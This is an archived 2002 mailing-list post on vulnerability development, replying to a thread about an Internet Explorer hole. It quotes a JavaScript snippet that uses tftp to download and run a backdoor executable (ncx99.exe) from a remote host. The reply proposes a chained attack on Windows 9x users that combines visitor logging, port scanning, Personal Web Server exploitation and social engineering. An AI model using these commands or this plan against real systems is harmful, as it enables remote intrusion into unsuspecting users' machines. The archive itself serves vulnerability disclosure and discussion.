Vulnerability Development mailing list archives
RE: Rather large MSIE-hole
From: "Wall, Kevin" <Kevin.Wall () qwest com>
Date: Thu, 14 Mar 2002 13:37:10 -0500
Felipe Franciosi wrote...

> var programName=new Array(
>   'c:/winnt/system32/tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe',
>   'c:/winnt/system32/ncx99.exe',
> );
>
> MS Windows 9x doesn't have a trivial ftp client by default... I was thinking how this could be exploitable on these versions... The FTP client offers the option to read a text file containing line-separated commands. But I couldn't get something like this to work:
>
> var prog...
>   'c:/command.com /c echo bin > c:/list.txt',
>   'c:/command.com /c echo GET something >> c:/list.txt'
>
> This won't create 'list.txt'... Any ideas why? Or how someone could get around it?
On Win9x systems, rather than targeting FTP or a command shell, what about starting up something that simply causes an exploitable process to listen on some port # (will vary, depending on application) and then separately trying to exploit that. One could monitor one's web server access logs to notice when someone downloaded the first half of the exploit (the innerhtml hole). (Alternately, write a servlet/JSP/CGI script and you don't even need to monitor the log file.) If the User-Agent corresponds to MSIE, then at some later time (perhaps wait t minutes), gently port scan the remote IP address to see if the application was launched. If the port scan succeeds, then go into full exploit mode. (This assumes an exploitable application that is normally not running and no pesky personal firewalls, etc. to be sure. But certainly some combinations would be vulnerable given the cluelessness of the typical Windoze users and their disdain for ever updating their system with security patches.)

A bigger assumption is choosing an exploitable application that (preferably) launches without user intervention or any command line arguments. I don't know that much about Windoze apps, so all I have is one candidate application [see below]. (I do all my development for Solaris; I just have to use WinNT & LookOut! from work--sigh). However, the "Personal Web Server" that comes with Win98 (and perhaps other Windoze systems?) comes to mind as a possibility. The Personal Web Server is so full of holes that the executable name is probably 'swisscheese.exe'. I seem to recall doing a Win9x re-install for a friend where I think I was prompted as to whether I wanted to RUN it, but I don't remember it prompting if I wanted to load it. IIRC, that might mean that it was installed, but just not started, by default. (Or perhaps it's part of a commonly chosen package.) I never ran PWS, so I don't know if the Personal Web Server needs to be configured first to run or what.

(If so, perhaps a bit of social engineering is in order. Tell people that a certain wizard dialog box is going to pop up and give them instructions on how to configure it, making up some excuse as to why they should do this. Surely someone would fall for it.)

The "good" thing about the Personal Web Server is that I believe that Microsoft's attitude with it with respect to security vulnerabilities has been pretty much to ignore them and to tell people to run IIS instead (since IIS is so much more secure ;-).

Anyway, just my $.02 worth.

BTW, just so you know, these are my personal opinions and in no way reflect the views of my company.

---
Kevin W. Wall
Qwest IT, Inc. / Security Infrastructure Dev Team
Kevin.Wall () qwest com
Phone: 614.932.5542

"Wipe Info uses hexadecimal values to wipe files. This provides more security than wiping with decimal values."
-- Norton System Works 2002 manual, pg 160